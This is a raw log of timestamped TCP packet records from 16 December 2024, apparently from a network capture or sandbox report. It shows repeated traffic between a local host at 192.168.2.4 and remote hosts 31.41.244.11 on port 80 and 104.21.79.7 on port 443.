                                                                                                                                                                                              Dec 16, 2024 01:01:42.343756914 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.343811035 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.343889952 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.343943119 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.345184088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.345235109 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.345313072 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.345365047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.346581936 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.346637964 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.346714020 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.346766949 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.348047018 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.348099947 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.348175049 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.348226070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.349432945 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.349495888 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.349562883 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.349620104 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.350258112 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:42.350879908 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.350935936 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.351012945 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.351062059 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.352354050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.352408886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.352408886 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.352461100 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.353730917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.353790045 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.353827953 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.353873968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.355170965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.355226040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.355273962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.355341911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.356581926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.356695890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.356719017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.356751919 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.357952118 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.358001947 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.365041971 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:42.365067005 CET49854443192.168.2.4104.21.79.7
                                                                                                                                                                                              Dec 16, 2024 01:01:42.365284920 CET44349854104.21.79.7192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.490585089 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.490628958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.490649939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.490708113 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.491148949 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.491188049 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.491202116 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.491235018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.492026091 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.492079020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.492137909 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.492189884 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.493175983 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.493232965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.493288994 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.493334055 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.494445086 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.494498968 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.494590998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.494640112 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.495570898 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.495621920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.495692015 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.495739937 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.496783018 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.496845007 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.496916056 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.496968031 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.497998953 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.498048067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.498112917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.498162031 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.499186039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.499295950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.499346972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.499346972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.500366926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.500421047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.500480890 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.500530005 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.501564980 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.501615047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.501686096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.501738071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.502777100 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.502827883 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.502881050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.502932072 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.503968954 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.504020929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.504096031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.504143000 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.505163908 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.505213022 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.505281925 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.505331039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.506383896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.506437063 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.506503105 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.506548882 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.507561922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.507610083 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.507693052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.507740974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.508773088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.508825064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.508898973 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.508944035 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.509962082 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.510008097 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.510082006 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.510128975 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.511179924 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.511230946 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.511306047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.511353016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.512392998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.512470007 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.512496948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.512547016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.513581991 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.513633966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.513700962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.513854980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.514820099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.514872074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.514925003 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.514972925 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.515974045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.516030073 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.516104937 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.516153097 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.517185926 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.517239094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.517317057 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.517365932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.518414021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.518467903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.518594027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.518642902 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.519612074 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.519665003 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.519757986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.519808054 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.520807981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.520853043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.520946980 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.520993948 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.522007942 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.522057056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.522108078 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.522159100 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.523267031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.523338079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.523416996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.523467064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.524369001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.524422884 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.524487972 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.524538994 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.525644064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.525696039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.525722027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.525767088 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.526793003 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.526848078 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.526859999 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.526894093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.527982950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.528034925 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.528167009 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.528215885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.529186010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.529234886 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.529325962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.529373884 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.530400038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.530450106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.530535936 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.530586004 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.531589031 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.531641006 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.531693935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.531737089 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.532785892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.532843113 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.532917976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.532965899 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.533983946 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.534035921 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.534095049 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.534142017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.535176039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.535227060 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.535273075 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.535335064 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.536359072 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.536412001 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.536482096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.536530972 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.537571907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.537626028 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.537715912 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.537776947 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.538785934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.538841009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.538896084 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.538947105 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.539987087 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.540044069 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.540087938 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.540136099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.541194916 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.541256905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.541287899 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.541337013 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.542381048 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.542432070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.542506933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.542557001 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.543569088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.543622971 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.543668985 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.543713093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.544785976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.544835091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.544891119 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.544939041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.545953989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.546004057 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.546077967 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.546125889 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.547169924 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.547220945 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.547224998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.547276020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.548388958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.548439026 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.548520088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.548563957 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.549562931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.549618959 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.549689054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.549737930 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.550767899 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.550834894 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.550890923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.550968885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.552004099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.552052975 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.552112103 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.552155018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.553133965 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.553179979 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.683168888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.683226109 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.683254957 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.683361053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.683665991 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.683726072 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.683726072 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.683774948 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.684808016 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.684861898 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.684864044 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.684911966 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.685745955 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.685797930 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.685868979 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.685918093 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.686927080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.686978102 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.687076092 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.687128067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.688127995 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.688179970 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.688241005 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.688291073 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.689321995 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.689374924 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.689444065 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.689491034 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.690502882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.690556049 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.690638065 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.690685987 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:42.691729069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:42.691802979 CET804984831.41.244.11192.168.2.4
